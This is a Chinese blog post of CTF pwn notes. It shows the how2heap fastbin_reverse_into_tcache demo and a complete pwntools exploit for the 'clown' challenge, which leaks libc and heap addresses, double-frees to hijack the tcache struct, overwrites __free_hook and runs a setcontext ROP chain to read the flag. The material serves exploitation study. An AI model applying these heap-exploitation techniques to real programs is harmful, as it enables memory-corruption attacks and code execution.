how2heap&fastbin_reverse_into_tcache劫持tcache strue

最新推荐文章于 2023-02-12 15:27:48 发布
最新推荐文章于 2023-02-12 15:27:48 发布
阅读量618 收藏 1
点赞数 1
分类专栏: CTF PWN 文章标签: 系统安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938904
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

**前言:
how2heap真实个不错的学习heap堆的地方,自己tcl!!!**
fastbin_reverse_into_tcache.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
 
const size_t allocsize = 0x40;
 
int main(){
  setbuf(stdout, NULL);
 
  printf(
    "\n"
    "This attack is intended to have a similar effect to the unsorted_bin_attack,\n"
    "except it works with a small allocation size (allocsize <= 0x78).\n"
    "The goal is to set things up so that a call to malloc(allocsize) will write\n"
    "a large unsigned value to the stack.\n\n"
  );
 
  // Allocate 14 times so that we can free later.
  char* ptrs[14];
  size_t i;
  for (i = 0; i < 14; i++) {
    ptrs[i] = malloc(allocsize);
  }
 
  printf(
    "First we need to free(allocsize) at least 7 times to fill the tcache.\n"
    "(More than 7 times works fine too.)\n\n"
  );
 
  // Fill the tcache.
  for (i = 0; i < 7; i++) {
    free(ptrs[i]);
  }
 
  char* victim = ptrs[7];
  printf(
    "The next pointer that we free is the chunk that we're going to corrupt: %p\n"
    "It doesn't matter if we corrupt it now or later. Because the tcache is\n"
    "already full, it will go in the fastbin.\n\n",
    victim
  );
  free(victim);
 
  printf(
    "Next we need to free between 1 and 6 more pointers. These will also go\n"
    "in the fastbin. If the stack address that we want to overwrite is not zero\n"
    "then we need to free exactly 6 more pointers, otherwise the attack will\n"
    "cause a segmentation fault. But if the value on the stack is zero then\n"
    "a single free is sufficient.\n\n"
  );
 
  // Fill the fastbin.
  for (i = 8; i < 14; i++) {
    free(ptrs[i]);
  }
 
  // Create an array on the stack and initialize it with garbage.
  size_t stack_var[6];
  memset(stack_var, 0xcd, sizeof(stack_var));
 
  printf(
    "The stack address that we intend to target: %p\n"
    "It's current value is %p\n",
    &stack_var[2],
    (char*)stack_var[2]
  );
 
  printf(
    "Now we use a vulnerability such as a buffer overflow or a use-after-free\n"
    "to overwrite the next pointer at address %p\n\n",
    victim
  );
 
  //------------VULNERABILITY-----------
 
  // Overwrite linked list pointer in victim.
  *(size_t**)victim = &stack_var[0];
 
  //------------------------------------
 
  printf(
    "The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"
  );
 
  // Empty tcache.
  for (i = 0; i < 7; i++) {
    ptrs[i] = malloc(allocsize);
  }
 
  printf(
    "Let's just print the contents of our array on the stack now,\n"
    "to show that it hasn't been modified yet.\n\n"
  );
 
  for (i = 0; i < 6; i++) {
    printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
  }
 
  printf(
    "\n"
    "The next allocation triggers the stack to be overwritten. The tcache\n"
    "is empty, but the fastbin isn't, so the next allocation comes from the\n"
    "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n"
    "Those 7 chunks are copied in reverse order into the tcache, so the stack\n"
    "address that we are targeting ends up being the first chunk in the tcache.\n"
    "It contains a pointer to the next chunk in the list, which is why a heap\n"
    "pointer is written to the stack.\n"
    "\n"
    "Earlier we said that the attack will also work if we free fewer than 6\n"
    "extra pointers to the fastbin, but only if the value on the stack is zero.\n"
    "That's because the value on the stack is treated as a next pointer in the\n"
    "linked list and it will trigger a crash if it isn't a valid pointer or null.\n"
    "\n"
    "The contents of our array on the stack now look like this:\n\n"
  );
 
  malloc(allocsize);
 
  for (i = 0; i < 6; i++) {
    printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]);
  }
 
  char *q = malloc(allocsize);
  printf(
    "\n"
    "Finally, if we malloc one more time then we get the stack address back: %p\n",
    q
  );
 
  assert(q == (char *)&stack_var[2]);
 
  return 0;
}

总体来说fastbin_reverse_onto_tcache主要是来劫持tc strue来达到任意地址申请的作用
在libc2.31版本之后要考虑tc的fd它是由源码进行了一系列加密,所以找出密钥直接解出即可
首先先将其tc填满,再次free将进入unsortbin,进行切割主要这里切割的和下面double free的size相同,这样能间断的绕过检测,然后进行fastbin_reverse_into_tcache double free修改其fd进而劫持tc strue,
布置恶意数据进而控制程序执行流即可
以照wjh师傅的MARDSCTF的clown的wp来看,clown题目要把的rop分成两段,这里要修改tc strue的counts数量然后再申请的时候可连续申请两个chunk进而控制执行流在 libc2.32 中新增了一个检测要求 tcache 申请的内容要与 0x10 对齐,否则会申请错误。

exp:

from pwn import *
context.log_level = "debug"
r = process('./clown')
#r = remote('pwn.machine.dasctf.com', 50501)
libc = ELF('libc/libc.so.6')
context.arch = "amd64"
def choice(idx):
    r.sendafter(">> ", str(idx))

def add(size, content = 'a'):
    choice(1)
    r.sendafter("Size: ", str(size))
    r.sendafter("Content: ", content)

def delete(idx):
    choice(2)
    r.sendafter("Index: ", str(idx))

def show(idx):
    choice(3)
    r.sendafter("Index: ", str(idx))

#leak libc

#fill tcache
for i in range(7):
    add(0x100)
add(0x100) #7
add(0x100) #8
for i in range(7):
    delete(i)

delete(7) #into unsortedbin
add(0x80) #9 partial overwrite
show(7)
libc_base = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x1b7d61
log.success("libc_base: " + hex(libc_base))
libc.address = libc_base
add(0x78) #10

#leak heap_base
add(0x68) #11
delete(11)
show(11)
heap_base = u64(r.recvuntil('\nDone', drop=True)[-5:].ljust(8, '\x00')) << 12
log.success("heap_base: " + hex(heap_base))

#doube free & fastbin into tcache
add(0x68, p64(0) * 2) #12
add(0x68) #13
#fill tcache
for i in range(7):
    add(0x68) #14-20
for i in range(7):
    delete(14 + i)

#double free
delete(11)
delete(13)
delete(11)
#fastbin into tcache
for i in range(7):
    add(0x68) #21-27

#change next -> tcache struct
add(0x68, p64((heap_base + 0xF0) ^ (heap_base >> 12))) #28
add(0x68) #29
add(0x68) #30

#counts0 -> 1
add(0xF8) #31
delete(31)
add(0xE8) #32
delete(32)

#hijack tcache struct 
add(0x68, p64(0) + p64(libc.sym['__free_hook'] + 0xF0) + p64(libc.sym['__free_hook'])) #33

#mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
gadget = libc_base + 0x0000000000124990
pop_rdi_addr = libc_base + 0x00000000000277d6
pop_rsi_addr = libc_base + 0x0000000000032032
pop_rdx_addr = libc.address + 0x00000000000c800d
fake_frame_addr = libc.sym['__free_hook'] + 0x10
frame = SigreturnFrame()

frame.rax = 0
frame.rdi = fake_frame_addr + 0xF8
frame.rsp = fake_frame_addr + 0xF8 + 0x10
frame.rip = pop_rdi_addr + 1  # : ret
rop_data = [
    libc.sym['open'],
    pop_rdx_addr,
    0x100,
    pop_rdi_addr,
    3,
    pop_rsi_addr,
    fake_frame_addr + 0x200,
    libc.sym['read'],
    pop_rdi_addr,
    fake_frame_addr + 0x200,
    libc.sym['puts']
]

payload = p64(gadget) + p64(fake_frame_addr) + '\x00' * 0x20 + p64(libc.sym['setcontext'] + 53) + str(frame)[0x28:] + "flag\x00\x00\x00\x00" + p64(0) + str(flat(rop_data))

add(0xF8, payload[:0xF0]) #34 write to __free_hook part1
add(0xE8, payload[0xF0:]) #35 write to __free_hook part2

delete(34)
r.interactive()

总结:此题是介绍了在libc高版本的题目存在uaf(指针没有清空)和add里面其修改内容来进行攻击利用 技巧,此技巧是根据我自己的理解来描述的,如有不对的地方,欢迎各位大佬留言,毕竟新手吗,tttttcl!!!!!!!

jsjsj11123
关注
专栏目录
ion_heap.rar_ION_V2 _heap
09-19
2. **缓存对齐**:为了提高数据访问效率,ION V2 heap会确保分配的内存块满足缓存对齐的要求,这对于硬件加速和数据传输至关重要。 3. **内存共享**:ION V2 heap支持跨进程的内存共享,允许多个驱动程序或者进程...
fastbin reverse into tcache
weixin_46483787的博客
02-10 2729
前言 一种任意地址写的方法 整体思路 这种方式可以在允许修改fd的情况下,仅利用fastbin范围内的chunk实现一个任意地址写 代码调试 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> const size_t allocsize = 0x40; int main(){ setbuf(stdout, NULL); char* ptrs[14
how2heap 深入学习(6)
CoLin的pwn小屋
03-12 721
how2heap glibc 2.27学习
pwn手记录题2
njh18790816639的博客
02-12 719
本题所使用的libc版本为2.34;(最新版libc2.34版本已经没有了所谓的hook函数,甚至exit_hook(实际为某个函数指针)也已经不能够使用;能够利用的手法已经很少了;可以看到Free释放函数总共可以使用11次,而Allocate申请函数可以使用0x2e次;如果按照fastbin_reverse_into_tcache的节奏来说,那么布局是如何的呢?
how2heap(2):fastbin_reverse_into_tcache 2.31
hollk’s blog
08-25 602
fastbin_reverse_into_tcache 2.27 源码 # gcc -g fastbin_reverse_into_tcache.c -o fastbin_reverse_into_tcache 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 #include <assert.h> 5 6 const size_t allocsiz
关于erlang中的timer:send_after
gavin的专栏
06-02 5122
erlang中有两个延时发送消息的函数erlang:send_after/3, timer:send_after/3,有什么区别呢? 看下timer:send_after/3的源码 send_after(Time, Pid, Message) -> req(apply_after, {Time, {?MODULE, send, [Pid, Message]}}) req(R
mysql tmp_table_size和max_heap_table_size大小配置
09-10
`tmp_table_size` 和 `max_heap_table_size` 这两个系统变量就与这种内存中的临时表息息相关,它们对数据库性能有着显著的影响。 `tmp_table_size` 是一个重要的配置参数,它决定了在每个线程中创建的内存临时表的...
native_heapdump_viewer.py
07-16
3.抓取步骤2进程的堆栈数据,如进程pid是4723 am dumpheap -n 4723 /data/00.txt am dumpheap -n 4723 /data/01.txt 4.格式化堆栈数据 python native_heapdump_viewer.py --symbols symbols 00.txt >00.log python ...
1216.rar_1216_1216. heap_C++_jqr_trailym4
07-15
使用最小化堆实现一个整型的优先队列,实现下列功能: insert x,将优先级值为x的元素入队 find x,找出优先级值大于x的最小的元素,输出其下标。如果有多个元素优先级值相同输出下标最小的那个。...
tcache的利用方法
qq_39869547的博客
10-27 1653
tcache_perthread_struct结构体是用来管理tcache链表: 这个结构体位于heap段的起始位置,且有size:0x251 typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS];//数组长度64,每个元素最大为0x7,仅占用一个字节(对应64个tcache链表) tcache_entr...
C++复习整理---指针、函数、const相关
DannieG的博客
10-13 156
指针int *p p:p指向的地址 *p:p指向的地址上的值 &p:存放指针p的地址 const const int p int const p 这两个相同的 指向整型常量的指针,指向的位置的值不能改变,可以改指针本身。理解成先const int或int const,再为指针。 就可以让这个指针指向有另一个值的另一个位置。 如果想要在同一个位置改值,就可以先让另一个指针指向这个位置,然后再从另一个指针改值。 比如: int u = (int)p;//得有(int),不然会提示是const int*
glibc Tcache机制
For Geek
10-15 3312
Tcache的简述 在Glibc的2.26中 新增了Tcache机制 这是ptmalloc2的缓存机制 Tcache在glibc中是默认开启的,在Tcache被开启的时候会定义如下东西 #if USE_TCACHE /* We want 64 entries. This is an arbitrary limit, which tunables can reduce. */ # define ...
how2heap2.31学习(1)
m0_51251108的博客
09-30 633
how2heap里的libc2.31的fastbin部分
glibc2.29堆溢出tcache的利用方式及原理
Hello World.c
03-06 8212
ibc2.29 堆溢出tcache的利用方式及原理 Dancing With Heap 与堆共舞 二进制学习之旅 参考资料: ctf-pwn https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-poisoning glibc wiki https://sourceware.org/glib...
How2Heap笔记(一)
kelxLZ的博客
01-21 2775
Author:ZERO-A-ONE Date:2021-01-21 ​ “how2heap”是shellphish团队在Github上开源的堆漏洞系列教程。上面有很多常见的堆漏洞教学示例,实现了以下技术: File Technique Glibc-Version Patch Applicable CTF Challenges first_fit.c Demonstrating glibc malloc’s first-fit behavior. calc_tcache_idx..
3.fastbin_dup_into_stack
06-08 488
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" 7 "r...
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 1028
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1:CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
高版本glibc的tcachefastbin指针加密机制
qq_51474381的博客
04-18 2035
先贴一下源码 tcache: static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); /* Mark this chunk as "in the tcache" so the test in _int_free will detect a
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1502
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的堆块,对于这些堆块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
HeapMaxAddr = (char*)&__heap_limit;
最新发布
06-02
HeapMaxAddr = (char*)&__heap_limit; 这行代码的作用是将堆的最大地址赋值给一个名为HeapMaxAddr的char类型指针变量。其中__heap_limit是一个在程序中预定义的符号,通常指向堆的最大地址。通过将其取地址并强制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值